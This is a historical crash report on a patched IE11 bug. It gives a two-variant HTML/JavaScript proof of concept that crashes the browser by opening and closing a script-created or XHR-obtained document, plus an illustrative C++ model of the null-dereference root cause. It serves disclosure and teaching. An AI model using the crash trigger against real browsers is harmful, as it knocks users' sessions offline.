A brief crash report. Calling open() and close() on a document created either by document.implementation.createHTMLDocument() or obtained as an XHR responseType="document" caused a null pointer dereference in MSHTML!CDoc::SubmitForAntiPhishProcessing.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_createHTMLDocument_or_XMLHttpRequest</title>
</head>
<body>
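<script>
// Variant 1: document created by script, never navigated.
function crash1()
{
    var doc = document.implementation.createHTMLDocument("");
    doc.open();
    doc.close();   // crash occurs during close()
}

// Variant 2: document obtained from a synchronous XHR with responseType="document".
function crash2()
{
    var oXML = new XMLHttpRequest();
    oXML.open("GET", "/", false);
    oXML.responseType = "document";
    oXML.send(null);
    var doc = oXML.response;
    doc.open();
    doc.close();   // same crash site as variant 1
}
</script>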
</body>
</html>
Both variants hit the same crash in MSHTML!CDoc::SubmitForAntiPhishProcessing+0x152 during the close() call, classified as PROBABLY_NOT_EXPLOITABLE. Documents created outside the normal navigation pipeline lacked the anti-phishing context that OnLoadStatusDone expected, causing a null dereference when the document tried to submit itself for phishing analysis after being opened and closed.
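A simplified C++ model of the root cause described above, added here as an illustration: it is not MSHTML's code, and every type and function name in it is hypothetical. It shows how a document built outside navigation reaches the close path with no context attached, and one way to harden that path (not necessarily the fix Microsoft shipped).

```cpp
// Simplified model of the root cause; every name is hypothetical, none is MSHTML's.
#include <cstdio>
#include <memory>
#include <string>

struct AntiPhishContext { std::string url; int submissions; };
enum class Origin { Navigation, CreateHTMLDocument, XhrResponse };

struct Document {
    Origin origin;
    std::unique_ptr<AntiPhishContext> ctx;  // set only by the navigation path
    bool is_open;
};

// Only navigation attaches a context; script-created documents get none.
Document make_document(Origin origin, const std::string& url) {
    Document d;
    d.origin = origin;
    d.is_open = false;
    if (origin == Origin::Navigation) {
        d.ctx.reset(new AntiPhishContext());  // value-initialised: submissions == 0
        d.ctx->url = url;
    }
    return d;
}

void doc_open(Document& d) { d.is_open = true; }

// Pre-fix shape: assumes every document finishing a load was navigated.
// With ctx == nullptr the increment below is the null dereference.
void close_unchecked(Document& d) {
    d.is_open = false;
    d.ctx->submissions++;
}

// Hardened shape: no context means nothing to submit, so skip the step.
bool close_checked(Document& d) {
    d.is_open = false;
    if (!d.ctx) return false;
    d.ctx->submissions++;
    return true;
}

int main() {
    // Constructed sample inputs.
    Document nav = make_document(Origin::Navigation, "https://example.test/");
    Document synth = make_document(Origin::CreateHTMLDocument, "");
    doc_open(nav);   std::printf("navigated submitted: %d\n", close_checked(nav));
    doc_open(synth); std::printf("synthetic submitted: %d\n", close_checked(synth));
}
```

`close_unchecked` is only safe on the navigated document; the two script-created origins are the cases the checked version exists for.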
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.